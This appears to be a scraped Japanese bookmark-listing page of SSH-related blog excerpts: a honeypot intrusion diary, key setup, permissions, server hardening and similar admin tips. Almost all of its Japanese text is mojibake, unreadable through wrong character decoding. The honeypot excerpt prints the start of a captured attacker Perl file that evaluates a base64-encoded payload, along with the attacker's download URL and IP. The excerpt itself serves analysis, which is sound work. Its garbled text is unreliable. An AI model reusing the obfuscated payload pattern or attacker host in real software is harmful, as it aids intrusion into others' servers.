TeleportThe Teleport Access PlatformThe easiest, most secure way to access and protect your infrastructure Teleport Access On-demand, least privileged access, on a foundation of cryptographic identity and zero trust
SSHä¸æ£ä¾µå…¥ã€è¦³å¯Ÿæ—¥è¨˜
ä¸æ£ã‚¢ã‚¯ã‚»ã‚¹ã‚’観測ã—ãŸã®ã§ã”紹介。 動画を見ã¦ã„ãŸã ã“ã†ã€‚ ãªã«ã‚„らä¸æ£ãƒ•ã‚¡ã‚¤ãƒ«ã‚’wgetã—ã¦å®Ÿè¡Œã—よã†ã¨ã—ã¦ã‚‹ã€‚ Kippoã¯ã€ä¾µå…¥è€…ãŒwgetã—ãŸãƒ•ã‚¡ã‚¤ãƒ«ã‚’ã€dl ディレクトリã«å…¨ã¦æ ¼ç´ã—ã¦ãれるã®ã§ä»Šå›žã¯å®Ÿéš›ã«ä¸å¯©ãªãƒ•ã‚¡ã‚¤ãƒ«ã®ä¸èº«ã‚’見ã¦ã¿ã‚ˆã†ã€‚ ä¸èº«ã‚’覗ã„ã¦ã¿ã‚‹ã€‚encodeã•ã‚Œã¦ã„ãŸã®ã§ã€è¦‹ãŸç›®ã§ã¯ã€ãªã«ã‚’ã™ã‚‹ã‚‚ã®ãªã‚“ã‹ã¯ã‚ã‹ã‚‰ãªã„。 # more dl/20150709223030_http___erixx_altervista_org_new_txt #!/usr/bin/perl use MIME::Base64; eval (decode_base64('IyEvdXNyL2Jpbi9wZXJsDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy
ssh専用ãƒãƒ‹ãƒ¼ãƒãƒƒãƒˆKippo
SSHã«è¾žæ›¸æ”»æ’ƒã—ã¦ã€ã‚µãƒ¼ãƒã«ä¾µå…¥ã—よã†ã¨è©¦ã¿ã‚‹ã‚¯ãƒ©ãƒƒã‚«ãƒ¼ã®å‹•å‘を追ã†ãŸã‚ã«ã€ssh用ã®ãƒãƒ‹ãƒ¼ãƒãƒƒãƒˆã‚’å°Žå…¥ã—ã¦ã¿ãŸã€‚ åå‰ã¯ã€ŒKippoã€ã€‚ ã‚¤ãƒ³ã‚¹ãƒˆãƒ¼ãƒ«æ‰‹é †ã¯sshãƒãƒ‹ãƒ¼ãƒãƒƒãƒˆã‚’kippoã§ä½œã£ã¦ã¿ã‚‹ ã‚’å‚考ã«ã•ã›ã¦ã„ãŸã ã„ãŸã€‚ 構æˆã¨ã—ã¦ã¯ä»¥ä¸‹ã®ã¨ãŠã‚Šã€‚ ┌──────────────┠│ Cracker │ └──────┬───────┘ │ │ port:22 │ │ â–¼ ┌───────────────────┠│ firewalld │ │ ↓ │ │ portfoward-to: │ │ 22222 │ │ ↓ │ │ Kippo │ └───────────────────┘ 2015-06-29 20:25:36+0900 [SSHService ssh-userauth on HoneyPotTransport,442,43.255.189.44] login a
ssh-copy-id コマンドを使ã£ã¦å…¬é–‹éµã‚’楽ã«è¨ç½®ã™ã‚‹
ã“ã‚Œã¾ã§å…¬é–‹éµã£ã¦ãƒ‡ã‚£ãƒ¬ã‚¯ãƒˆãƒªã‚’作ã£ã¦ scp ã—ã¦ãƒ‘ーミッションを変ãˆã¦ãƒ¼ã¿ãŸã„ã«ã‹ãªã‚Šé¢å€’ãã•ã„ã“ã¨ã‚’ã—ã¦ãŸã‘ã© ssh-copy-id コマンドを使ã†ã¨æ¥½ã§ãã‚‹ã¿ãŸã„。 Linux ディストリビューションãªã‚‰æœ€åˆã‹ã‚‰å…¥ã£ã¦ã‚‹ã‚‚ã®ã‚‚多ãã†ã ã‘ã© Mac OS X ã«ã¯å…¥ã£ã¦ãªã‹ã£ãŸã®ã§ Homebrew ã‹ã‚‰å…¥ã‚Œã‚‹ã€‚ $ brew install ssh-copy-id 何ã¯ã¨ã‚‚ã‚れ公開éµãƒšã‚¢ã‚’作る。 $ ssh-keygen -t rsa 作ã£ãŸå…¬é–‹éµã‚’ã€ç›®çš„ã®ãƒ›ã‚¹ãƒˆã«è¨ç½®ã™ã‚‹ã€‚ 以下ã®ã‚³ãƒžãƒ³ãƒ‰ã‚’å©ãã¨ãƒ‘スワードã§ãƒã‚°ã‚¤ãƒ³ã‚’促ã•ã‚Œã‚‹ã€‚ $ ssh-copy-id -i ~/.ssh/id_rsa.pub <username>@<host> 上手ãã„ã‘ã°å…¬é–‹éµã‚’使ã£ã¦ãƒã‚°ã‚¤ãƒ³ã§ãるよã†ã«ãªã£ã¦ã„ã‚‹ã¯ãšã€‚ $ ssh <username>@<host> ã‚ã§ãŸã—ã‚ã§ãŸã—。
Dockerコンテナ内ã§sshdを実行ã—ã¦ã¯ã„ã‘ãªã„ç†ç”± | POSTD
Dockerを使ã„始ã‚ãŸäººãŒã‚ˆãã™ã‚‹è³ªå•ã¨ã„ãˆã°ã€ã€Œã©ã†ã™ã‚Œã°ã‚³ãƒ³ãƒ†ãƒŠã«å…¥ã‚Œã¾ã™ã‹ï¼Ÿã€ã§ã™ã€‚ãã®è³ªå•ã«å¯¾ã—ã¦ã€ã€Œã‚³ãƒ³ãƒ†ãƒŠå†…ã§SSHサーãƒã‚’èµ·å‹•ã™ã‚Œã°ã„ã„よã€ã¨ç”ãˆã‚‹äººãŸã¡ãŒã„ã¾ã™ãŒã€ã“ã‚Œã¯éžå¸¸ã«ãƒžã‚ºã„ã‚„ã‚Šæ–¹ã§ã™ã€‚ãªãœãã®æ–¹æ³•ãŒé–“é•ã„ãªã®ã‹ã€ãã—ã¦ä»£ã‚ã‚Šã«ã©ã†ã™ã‚Œã°ã‚ˆã„ã®ã‹ã‚’ã“ã‚Œã‹ã‚‰ç´¹ä»‹ã—ã¾ã™ã€‚ 注:本記事ã¸ã®ã‚³ãƒ¡ãƒ³ãƒˆã‚„シェアã¯ã€ Dockerブãƒã‚° ã«ã‚¢ãƒƒãƒ—ã•ã‚ŒãŸæ¨™æº–版ã‹ã‚‰è¡Œã£ã¦ãã ã•ã„。よã‚ã—ããŠé¡˜ã„ã—ã¾ã™ã€‚ コンテナã§SSHサーãƒã‚’èµ·å‹•ã™ã¹ãã§ã¯ãªã„ …もã¡ã‚ã‚“ã€ã‚³ãƒ³ãƒ†ãƒŠè‡ªä½“ãŒSSHサーãƒã§ã‚ã‚‹å ´åˆã¯é™¤ãã¾ã™ã€‚ SSHサーãƒã‚’èµ·å‹•ã—ãŸããªã‚‹æ°—æŒã¡ã¯åˆ†ã‹ã‚Šã¾ã™ã€‚ãã‚Œã¯ã‚³ãƒ³ãƒ†ãƒŠã®â€ä¸ã«å…¥ã‚‹â€ç°¡å˜ãªæ–¹æ³•ã ã‹ã‚‰ã§ã™ã€‚ã“ã®æ¥ç•Œã®äººãªã‚‰ã»ã¼å…¨å“¡ãŒSSHを一度ã¯ä½¿ã£ãŸã“ã¨ãŒã‚ã‚Šã¾ã™ã€‚多ãã®äººãŒSSHを日常的ã«ä½¿ç”¨ã—ã€å…¬é–‹éµã‚„秘密éµã€ãƒ‘スワード入力ã®çœç•¥ã€èªè¨¼ã‚¨ãƒ¼ã‚¸ã‚§ãƒ³ãƒˆã€ãã—ã¦æ™‚ã«ã¯ãƒãƒ¼ãƒˆè»¢é€ã‚„ãã®
GitHubユーザーã®SSHéµ6万個を調ã¹ã¦ã¿ãŸ - hnwã®æ—¥è¨˜
(2015/1/30 追記)時期ã¯ä¸æ˜Žã§ã™ãŒã€ç¾æ™‚点ã®github.comã¯Ed25519éµã«ã‚‚対応ã—ã¦ã„ã¾ã™ã€‚ (2016/5/31 追記)「GitHubã«ãƒã‚°å ±å‘Šã—ã¦è³žé‡‘$500ã‚’é ‚ã„ãŸè©±ã€ã§ç´¹ä»‹ã—ãŸé€šã‚Šã€æ—¢ã«å¼±ã„éµã¯GitHubã‹ã‚‰å‰Šé™¤ã•ã‚Œã€æ–°è¦ç™»éŒ²ã‚‚ã§ããªããªã£ã¦ã„ã¾ã™ã€‚ GitHub APIを利用ã—ã¦ã€GitHubã®31661アカウントã«ç™»éŒ²ã•ã‚Œã¦ã„ã‚‹SSH公開éµ64404個をå–å¾—ã—ã¦ã¿ã¾ã—ãŸã€‚抽出方法*1ãŒé©å½“ã™ãŽã¦åã‚ŠãŒã‚るよã†ãªæ°—ã‚‚ã—ã¾ã™ãŒã€é¢ç™½ã„çµæžœãŒå¾—られãŸã¨æ€ã†ã®ã§ã¾ã¨ã‚ã¦ã¿ã¾ã™ã€‚ SSHéµã®ç¨®é¡ž éµã®ç¨®é¡ž 個数 å‰²åˆ RSAéµ 61749 (95.88%) DSAéµ 2647 (4.11%) ECDSAéµ 8 (0.01%) ç´„6万個ã®éµã®ã†ã¡ã€8個ã ã‘ECDSA(楕円DSA)éµãŒè¦‹ã¤ã‹ã‚Šã¾ã—ãŸï¼å¸¸ç”¨ã—ã¦ã„ã‚‹ã®ã‹è©¦ã—ã«ç™»éŒ²ã—ã¦ã¿ãŸã ã‘ãªã®ã‹ã¯ã‚ã‹ã‚Šã¾ã›ã‚“ãŒã€ä½•ã«ã›ã‚ˆ
複数㮠public key ã‚’ .ssh/config ã§ç®¡ç†ã™ã‚‹
複数㮠public key (公開éµ) を仕方ãªã作ã£ã¦ã—ã¾ã£ãŸã€‚ã“ã†ã„ã†æ™‚ã€ç›¸æ‰‹ã‚µãƒ¼ãƒãƒ¼ã«ã‚ˆã£ã¦ä½¿ã† private key (秘密éµ) を指定ã—ã¦ã‚¢ã‚¯ã‚»ã‚¹ã—ãªã„ã¨ã„ã‘ãªã„。.ssh/config ã«è¨å®šã‚’åŠ ãˆã‚‹ã¨ã€ã‚µãƒ¼ãƒãƒ¼ã”ã¨ã«åˆ©ç”¨ã™ã‚‹ key を切り替ãˆã¦ãれる。 key ã®ç”Ÿæˆ ã¾ãš key ã®ç”Ÿæˆã™ã‚‹ã€‚一般的㪠key ã®ä½œã‚Šæ–¹ã¯éŽåŽ»ã‚¨ãƒ³ãƒˆãƒªãƒ¼å‚ç…§ã®ã“ã¨ã€‚ clmemo@aka: SSH ã®å…¬é–‹éµæš—å·æ–¹å¼ã«ã‚ˆã‚‹ãƒã‚°ã‚¤ãƒ³èªè¨¼ ssh-keygen ã§è¤‡æ•°ã® public key を作る。今回ã¯ã‚¿ã‚¤ãƒ—ã®é•ã† 2 ã¤ã®éµã‚’作ã£ãŸã€‚-f オプションã§éµãƒ•ã‚¡ã‚¤ãƒ«ã®ãƒ•ã‚¡ã‚¤ãƒ«åを指定ã§ãã‚‹ (デフォルト㯠.ssh/id)。 $ ssh-keygen -t dsa -f .ssh/id_dsa $ ssh-keygen -t rsa -f .ssh/id_rsa 作ã£ãŸ public key
公開éµã§SSHã«æŽ¥ç¶šã§ããªã„ã¨ã(ãŠã¾ã‘:複数ã®å…¬é–‹éµã‚’一ã¤ã®ãƒ¦ãƒ¼ã‚¶ãƒ¼ã«è¨å®šã™ã‚‹ï¼‰
SSHãŒéµèªè¨¼ã•ã‚Œãªã„ã¨ãã€ãƒ‘ーミッションを疑ãˆã€‚ – ブックマクãƒé–‹ç™ºã« ã“ã‚ŒãŒã†ã£ã‹ã‚Šï¼—ï¼—ï¼—ã«ãªã£ã¦ãŸã€‚ホームディレクトリãŒï¼—ï¼—ï¼—ã ã¨æ°¸é ã«authorized_keysã¯ç„¡åŠ¹åŒ–ã•ã‚Œã‚‹ã€‚ 気付ãã¾ã§ã«30時間ãらã„試行錯誤ã—ã¦é€±æœ«ãŒæ¶ˆãˆãŸã€‚ ã‚ã‚…ãã†ãªã®ã‹â€¦ çµæžœçš„ã«ã“ã†ã—ãŸã‚‰ä¸Šæ‰‹ãã„ãã¾ã—ãŸã€‚ /home/usename [0755]/.ssh [0700]authorized_keys [0600] 一応ã€èªè¨¼ã§ãã¦ã„るユーザーをå‚考ã«ãƒ‘ーミッションã®ãƒã‚§ãƒƒã‚¯ã‚‚ã—ã¦ã„ãŸã¯ãšãªã‚“ã§ã™ã‘ã©ã€å ´å½“ãŸã‚Šçš„ã«å¤‰æ›´ã—ã¦ãŸã›ã„ã§ã€ä¸€ã¤ã‚’æ£ã—ãè¨å®šã—ãŸã®ã«ä»–ã®ä¸€ã¤ã‚’é–“é•ã£ã¦è¨å®šâ†’æ··ä¹±ã¿ãŸã„ãªã“ã¨ã‚„ã£ã¦ã¾ã—ãŸã€‚最終的ã«ã¯ã€Œ.sshã€ãƒ‡ã‚£ãƒ¬ã‚¯ãƒˆãƒªã®ãƒ‘ーミッションãŒ777ã«ãªã£ã¦ã¾ã—ãŸã€‚間抜ã‘ã™ãŽã€‚家æ—ã¿ã‚“ãªã§éµæŽ›ã‘ã¦æœ€çµ‚çš„ã«é–‹ã„ã¦ã¾ã—ãŸçš„ãªã€‚パーミションをã„ã„åŠ æ¸›ã«è¨å®šã—ãŸã‚‰ãƒ€ãƒ¡ã ã。 上手ãã„ã‹ãª
[ã‚’] Mac OS X ã‹ã‚‰ ssh 接続ã—ã¦ã‚‚ã™ã切れã¡ã‚ƒã†å•é¡Œã«å¯¾å‡¦
Mac OS X ã‹ã‚‰ ssh 接続ã—ã¦ã‚‚ã™ã切れã¡ã‚ƒã†å•é¡Œã«å¯¾å‡¦ 2008-02-26-2 [Tips][Mac] ã“ã“最近ã€ç§ã‚’æ‚©ã¾ã™ Mac OS X ã§ã®å›°ã‚Šäº‹ã€‚ (1) Terminal ã‹ã‚‰ ssh ã§ãƒã‚°ã‚¤ãƒ³ã—ã¦ã‚‚ã—ã°ã‚‰ãã™ã‚‹ã¨åˆ‡ã‚Œã¡ã‚ƒã†ã€‚ (2) sshfs を使ã£ã¦ã‚‹ã¨åŒæ§˜ã«æŽ¥ç¶šãŒåˆ‡ã‚Œã‚‹ã‚“ã ã‘ã©ã€ ãã®ã¨ãã†ã£ã‹ã‚Š Finder ã§å¤‰ãªã¨ã“ã‚ã‚’ã„ã˜ã‚‹ã¨ OS ãŒå›ºã¾ã£ã¡ã‚ƒã†[2008-01-27-1]。 ã©ã†ã—ãŸã‚‚ã®ã‹ãªã‚ã€ã¨æ€ã£ã¦ãŸã‚‰ã“ã‚“ãªãƒšãƒ¼ã‚¸ã‚’ç™ºè¦‹ï¼ - keep-alive for ssh ttp://www.geocities.co.jp/AnimeComic/1098/documents/unixmemo/\ ssh-keepalive.html http://hnw.jp/documents/unixmemo/ssh-keepalive.html (追記08
![[ã‚’] Mac OS X ã‹ã‚‰ ssh 接続ã—ã¦ã‚‚ã™ã切れã¡ã‚ƒã†å•é¡Œã«å¯¾å‡¦](https://cdn-ak-scissors.b.st-hatena.com/image/square/af37977ee866988286b95e74fff98500a190545c/height=288;version=1;width=512/https%3A%2F%2Fchalow.net%2Fimages%2Ftcl-logo-25.png){kind=logo}
続 ã›ã£ã‹ã¡ãªäººã®ãŸã‚ã® git 入門 - 共有リãƒã‚¸ãƒˆãƒªã®ä½œã‚Šæ–¹ : 僕ã¯ç™ºå±•é€”上技術者
久々 git ã®ã‚»ãƒƒãƒˆã‚¢ãƒƒãƒ—ã‚’ã™ã‚‹ã“ã¨ã«ãªã‚Šã€è‡ªåˆ†ã§æ›¸ã„ãŸè¨˜äº‹ã‚’å‚考ã«ã™ã‚‹ã€‚ » ã›ã£ã‹ã¡ãªäººã®ãŸã‚ã® git 入門 - git をインストールã—ã€å…±åŒã§é–‹ç™ºã§ãる環境を整ãˆã‚‹ã¾ã§ : 僕ã¯ç™ºå±•é€”上技術者 ã„ã¤ã®ã¾ã«ã‹ã¯ã¦ãªã‚¹ã‚¿ãƒ¼ãŒãŸãã•ã‚“ã¤ãã€ãƒ–ックマーク数も400を超ãˆã¦ã„ãŸã€‚ã•ã™ãŒã¯ã¦ãªãƒ¦ãƒ¼ã‚¶ãƒ¼ã€‚「git ãªã«ãれ?ã€ã¨ã„ã†ã®ãŒä¸€èˆ¬ãƒ¦ãƒ¼ã‚¶ãƒ¼ã¯ã‚‚ã¡ã‚ã‚“ã€å¤šãã®ãƒ—ãƒã‚°ãƒ©ãƒžãƒ¼ï¼ˆãƒ–ãƒã‚°æ›¸ã„ãŸã‚Šèªã‚“ã ã‚Š twitter 使ã£ã¦ãŸã‚Šã™ã‚‹ã¨åƒ•ã‚‰webç³»ã€ã‚ªãƒ¼ãƒ—ン系ãŒå¤šæ•°æ´¾ã ã¨å‹˜é•ã„ã—ã¦ã—ã¾ã„ãã†ã«ãªã‚‹ãŒã€æ±ºã—ã¦ãã†ã§ã¯ãªã„ã®ã§ã™ã‚ˆã)ã®åå¿œã ã¨æ€ã†ã®ã ãŒã€‚。。 ã•ã¦ã€ä¸Šè¨˜è¨˜äº‹ã§ã¯è§¦ã‚Œã¦ã„ãªã„ã€å…±æœ‰ãƒ¬ãƒã‚¸ãƒˆãƒªã®ä½œæˆæ–¹æ³•ã‚’書ãç•™ã‚ã¦ãŠãã¾ã™ã€‚ ã¾ãšæº–å‚™ã¨ã—ã¦ãƒªãƒã‚¸ãƒˆãƒªã‚’使ã†ã“ã¨ã«ãªã‚‹è¤‡æ•°ãƒ¦ãƒ¼ã‚¶ãƒ¼ã‚’åŒä¸€ã‚°ãƒ«ãƒ¼ãƒ—ã«æ‰€å±žã•ã›ã¾ã™ã€‚ 太郎ãã‚“ã€æ¬¡éƒŽãã‚“ã®ã‚¢ã‚«ã‚¦ãƒ³ãƒˆã‚’作æˆã€‚ % sudo useradd tar
リモートã§ãƒ—ãƒã‚°ãƒ©ãƒŸãƒ³ã‚°ã‚’æ•™ãˆã‚‹éš›ã«ä½¿ã†ãƒ„ール類 - åã£ãŸè¨€èªžä¿¡è€…ã®åž‚ã‚Œæµã—
プãƒã‚°ãƒ©ãƒŸãƒ³ã‚°ã‚’知りåˆã„ãªã©ã«æ•™ãˆã‚‹ã¨ãã«ä½¿ã£ã¦ã‚‹ãƒ„ール類。 å‰æã ã‘ã©ã‚‚ã€ã“ã†ã„ã£ãŸãƒ„ール類をã™ãã«ä½¿ã„ã“ãªã›ã‚‹ãらã„コンピュータã€ã‚¤ãƒ³ã‚¿ãƒ¼ãƒãƒƒãƒˆã«æ…£ã‚Œã¦ã‚‹äººã§ã‚ã‚‹ã“ã¨ã€‚ リモートã˜ã‚ƒãªã„å ´åˆã¯ã©ã†ã‚„ã£ã¦æ•™ãˆã¦ã‚‹ã‹ 直接画é¢ã‚’見ã›ãªãŒã‚‰ãƒ—ãƒã‚°ãƒ©ãƒ を入力ã—ã¦ã€å‹•ã‹ã—ã¦èª¬æ˜Žã—ã¦ã‚‹ã€‚ファイルを渡ã™ã¨ãã¯USBメモリã§æ¸¡ã™ã€‚ ã¤ã¾ã‚Šã“れらをå„種ツールを使ã£ã¦ã‚¤ãƒ³ã‚¿ãƒ¼ãƒãƒƒãƒˆã”ã—ã«åŒæ§˜ã«ã§ãるよã†ã«ã™ã‚‹ã€‚ 繋ã(å ´æ‰€ã®å•é¡Œã®è§£æ±º) ã¾ãšã¯æ¨ªã«ã„る状態ã€ã¤ã¾ã‚Šãƒãƒƒãƒˆãƒ¯ãƒ¼ã‚¯çš„ã«åŒã˜ç©ºé–“ã«ã„る状態を作らãªã„ã¨å„種ツールを使ã†ã®ã«ä¸ä¾¿ã§ã™ã€‚ ã‚°ãƒãƒ¼ãƒãƒ«IPã§ç‰‡æ–¹ã«ç¹‹ãŒã‚‹ç’°å¢ƒãŒã‚ã‚Œã°å¿…è¦ãªã‹ã£ãŸã‚Šã™ã‚‹ã‹ã‚‚ã—ã‚Œãªã„ã‘ã©ã€å¿…è¦ã§ã‚ã‚Œã°VPNã‚„SSHãªã©ã§ãƒˆãƒ³ãƒãƒ«æŽ˜ã‚‹ãªã‚Šã—ã¦ã€LAN環境を作りã¾ã™ã€‚ VPN 手軽ã«ä½¿ã„ãŸã„ãªã‚‰Hamachiãªã©ã®P2Pã§ã¤ãªã’ã‚‹ã‚‚ã®ã€ã—ã£ã‹ã‚Šã‚„ã‚‹ãªã‚‰OpenVPNã¨ã„ã£ãŸã¨ã“ã‚ã‹ã€‚
ã“ã‚Œãらã„ã‚„ã£ã¨ã‘ 〜Linuxサーãƒã®ã‚»ã‚ュリティè¨å®šã€œ - nabeã®é›‘記帳
管ç†ä¸ã®ã‚µãƒ¼ãƒã§è¡Œã£ã¦ã„ã‚‹ã‚»ã‚ュリティè¨å®šã‚’公開ã—ã¾ã™ã€‚本当ã¯ã“ã†ã„ã†ã“ã¨ã‚’公開ã™ã‚‹ã®ã¯ã‚ˆã‚ã—ããªã„ã®ã§ã™ãŒã€è„†å¼±ã‚µãƒ¼ãƒãŒæ°¾æ¿«ã—ã¦ã„ã‚‹ç¾çŠ¶ãã“ãŒè¸ã¿å°ã¨ãªã£ã¦sshアタックã•ã‚Œã‚‹ã®ã‚‚迷惑極ã¾ã‚Šãªã„ã®ã§ã€æœ€ä½Žé™ã‚„ã£ã¨ã‘ã¨ã„ã†å†…容ã§ã¾ã¨ã‚ã¾ã—ãŸã€‚*1 起動サービスã¨æ¦‚è¦ iptables/Firewallã®è¨å®š iptablesã®ä¸èº« limit-burstã«ã¤ã„㦠hashlimitã«ã¤ã„㦠hosts.allow/hosts.deny(TCP Wrapper)ã®è¨å®š sshdã®è¨å®š ãã®ä»–ã®è¨å®š Apacheã®è¨å®š Postfixã®è¨å®š Dovecotã®è¨å®š ã¾ã¨ã‚ 起動サービスã¨æ¦‚è¦ Apache (www) sshd smtp/pop bind (DNS) ntpd ã„ãã¤ã‹ã®æ³¨æ„点。 sftpã§å分ãªã®ã§ftpdã¯ä½¿ã‚ãªã„。WinSCPç‰ã‚’使ãˆã°ffftpã«ä¾å˜ã™ã‚‹å¿…è¦ã¯ãªã„。*2
ã¯ã¦ãªã‚°ãƒ«ãƒ¼ãƒ—ã®çµ‚了日を2020å¹´1月31æ—¥(金)ã«æ±ºå®šã—ã¾ã—㟠- ã¯ã¦ãªã®å‘ŠçŸ¥
ã¯ã¦ãªã‚°ãƒ«ãƒ¼ãƒ—ã®çµ‚了日を2020å¹´1月31æ—¥(金)ã«æ±ºå®šã—ã¾ã—㟠以下ã®ã‚¨ãƒ³ãƒˆãƒªã®é€šã‚Šã€ä»Šå¹´æœ«ã‚’目処ã«ã¯ã¦ãªã‚°ãƒ«ãƒ¼ãƒ—を終了予定ã§ã‚る旨をãŠçŸ¥ã‚‰ã›ã—ã¦ãŠã‚Šã¾ã—ãŸã€‚ 2019年末を目処ã«ã€ã¯ã¦ãªã‚°ãƒ«ãƒ¼ãƒ—ã®æ供を終了ã™ã‚‹äºˆå®šã§ã™ - ã¯ã¦ãªã‚°ãƒ«ãƒ¼ãƒ—日記 ã“ã®ãŸã³ã€æ£å¼ã«çµ‚了日を決定ã„ãŸã—ã¾ã—ãŸã®ã§ã€ä»¥ä¸‹ã®é€šã‚Šã”確èªãã ã•ã„。 終了日: 2020å¹´1月31æ—¥(金) エクスãƒãƒ¼ãƒˆå¸Œæœ›ç”³è«‹æœŸé™:2020å¹´1月31æ—¥(金) 終了日以é™ã¯ã€ã¯ã¦ãªã‚°ãƒ«ãƒ¼ãƒ—ã®é–²è¦§ãŠã‚ˆã³æŠ•ç¨¿ã¯è¡Œãˆã¾ã›ã‚“。日記ã®ã‚¨ã‚¯ã‚¹ãƒãƒ¼ãƒˆãŒå¿…è¦ãªæ–¹ã¯ä»¥ä¸‹ã®è¨˜äº‹ã«ã—ãŸãŒã£ã¦æ‰‹ç¶šãã‚’ã—ã¦ãã ã•ã„。 ã¯ã¦ãªã‚°ãƒ«ãƒ¼ãƒ—ã«æŠ•ç¨¿ã•ã‚ŒãŸæ—¥è¨˜ãƒ‡ãƒ¼ã‚¿ã®ã‚¨ã‚¯ã‚¹ãƒãƒ¼ãƒˆã«ã¤ã„㦠- ã¯ã¦ãªã‚°ãƒ«ãƒ¼ãƒ—日記 ã”利用ã®ã¿ãªã•ã¾ã«ã¯ã”迷惑をãŠã‹ã‘ã„ãŸã—ã¾ã™ãŒã€ã©ã†ãžã‚ˆã‚ã—ããŠé¡˜ã„ã„ãŸã—ã¾ã™ã€‚ 2020-06-25 追記 ã¯ã¦ãªã‚°ãƒ«ãƒ¼ãƒ—日記ã®ã‚¨ã‚¯ã‚¹ãƒãƒ¼ãƒˆãƒ‡ãƒ¼ã‚¿ã¯2020å¹´2月28
Pythonã§Webアプリã¤ãã‚‹ã®ã«DotCloudã«ç™»éŒ²ã—ãªã„手ã¯ãªã„ - YAMAGUCHI::weblog
ã¯ã˜ã‚㫠サエンãƒã‚¤ãƒŽãƒ¼ï¼ˆã“ã‚“ã«ã¡ã¯ï¼‰ã€Pythonç•Œã®ãƒ¡ãƒ³ã‚½ãƒ¬ãƒ¼ã‚¿ãƒ ã§ã™ã€‚ã•ã¦çŒ«ã‚‚æ“åもクラウドã®æ™‚代ã§ã™ãŒã€ã¿ãªã•ã‚“ã„ã‹ãŒãŠéŽã”ã—ã§ã—ょã†ã‹ã€‚先日ãµã¨ã€ŒDotCloudã€ã¨ã„ã†ã‚µãƒ¼ãƒ“スを見ã‹ã‘ã¦ãƒ™ãƒ¼ã‚¿ç™»éŒ²ã—ãŸã®ã§ã€ã”紹介致ã—ã¾ã™ã€‚ DotCloudã£ã¦ãªã«ï¼Ÿ dotCloud - One home for all your apps DotCloudã¯ã„ã¾ã¾ã§Webアプリケーションホスティングサービスã®ä¸ã§æœŸå¾…ã•ã‚Œã¦ã„ãŸé ˜åŸŸã«åˆ‡ã‚Šè¾¼ã‚‚ã†ã¨ã—ã¦ã¾ã™ã‚ˆã€‚ã¾ãšä½¿ãˆã‚‹è¨€èªžã¯PHP, Ruby, Python, JavaãŒã„ã¾ã®betaã®æ™‚点ã§ä½¿ãˆã¦ã€ã•ã‚‰ã«ã“ã‚Œã‹ã‚‰ãƒªã‚¯ã‚¨ã‚¹ãƒˆãŒã‚る言語ã«ã‚‚対応ã—よã†ã¨ã—ã¦ã¾ã™ã€‚(Erlangã¨ã‹Schemeã¨ã‹ï¼‰ã§ã€DBã¨ã‹MQã¨ã‹ã™ã§ã«æœ‰å所ã¯ã„ãã¤ã‹ä½¿ãˆã¦ã€ãªã‚“ã§ã‚‚リクエストãŒã‚ã‚Œã°å¯¾å¿œã™ã‚‹ãœï¼ã£ã¦ã„ã†å‹¢ã„。ã¾ãŸã‚¹ã‚±ãƒ¼ãƒ«ã«é–¢ã—ã¦ã‚‚スケールアップã€ã‚¹ã‚±ãƒ¼ãƒ«ã‚¢ã‚¦
(新人å‘ã‘) Unixオペレーションã®æ³¨æ„点 - Magical Diary
主ã«æ–°äººå‘ã‘ã¨ã—ã¦ã€Unixサーãƒã§ä½œæ¥ã‚’ã™ã‚‹éš›ã®æ³¨æ„点を書ã„ã¦ãŠã。 ã“ã“ã«æ›¸ã„ã¦ã‚る内容ã¯çµ¶å¯¾çš„ãªã‚‚ã®ã§ã¯ãªã„ã—ã€ä¼šç¤¾ã‚„ç¾å ´ã”ã¨ã«ãƒ«ãƒ¼ãƒ«ãŒã‚ã‚‹ã®ã§ã€é©å®œãƒ«ãƒ¼ãƒ«ã«åˆã‚ã›ã¦å®Ÿè·µã™ã‚Œã°è‰¯ã„。 ãƒã‚°ã‚’å–ã‚Œ 何をやã£ãŸã‹ã€ä½•ã‚’やらãªã‹ã£ãŸã‹ã€ã¨ã„ã†ã‚¨ãƒ“デンスã®ãŸã‚ã«ãƒã‚°ã¯å¿…ãšæ®‹ã—ã¦ãŠã。SSHクライアントã«ã‚ˆã£ã¦ã¯æ¯Žå›žè‡ªå‹•çš„ã«ãƒã‚°å–å¾—ã™ã‚‹è¨å®šãŒå¯èƒ½ãªã®ã§ã€è¨å®šã—ã¦ãŠãã¨è‰¯ã„ã ã‚ã†ã€‚ 作æ¥å¾Œã«å•é¡ŒãŒç™ºç”Ÿã—ãŸå ´åˆã«ä½œæ¥å†…容を確èªã™ã‚‹ãŸã‚ã«ã‚‚使ã†ãŸã‚ã€å¿…ãšãƒã‚°ã¯å–å¾—ã—ã¦ãŠãã“ã¨ã€‚ (追記) 当ãŸã‚Šå‰ã ãŒã€ã‚³ãƒžãƒ³ãƒ‰ã¨ãã®å‡ºåŠ›ã‚’ペアã§å–ã‚‹ã“ã¨ã«æ„味ãŒã‚る。 set -x (set verbose) ã—ã‚ ãƒã‚°ã‚’å–å¾—ã—ã¦ã‚‚ã€ã‚³ãƒžãƒ³ãƒ‰ãƒ©ã‚¤ãƒ³ã‚’編集ã—ãŸéš›ã«ã¯ä»¥ä¸‹ã®ã‚ˆã†ã«éžå¸¸ã«è¦‹ã¥ã‚‰ã„ã‚‚ã®ã¨ãªã£ã¦ã—ã¾ã†ã€‚(ãŒã‚“ã°ã‚Œã°è§£æžã™ã‚‹ã“ã¨ã¯å‡ºæ¥ã‚‹ãŒâ€¦) ESC[0mESC[27mESC[24mESC[JESC[1myasu
1
メンテナンス
ãŠçŸ¥ã‚‰ã›
障害
リリースã€éšœå®³æƒ…å ±ãªã©ã®ã‚µãƒ¼ãƒ“スã®ãŠçŸ¥ã‚‰ã›
最新ã®äººæ°—エントリーã®é…ä¿¡
j次ã®ãƒ–ックマーク
kå‰ã®ãƒ–ックマーク
lã‚ã¨ã§èªã‚€
eコメント一覧を開ã
oページを開ã
{{#tags}}- {{label}}
{{/tags}}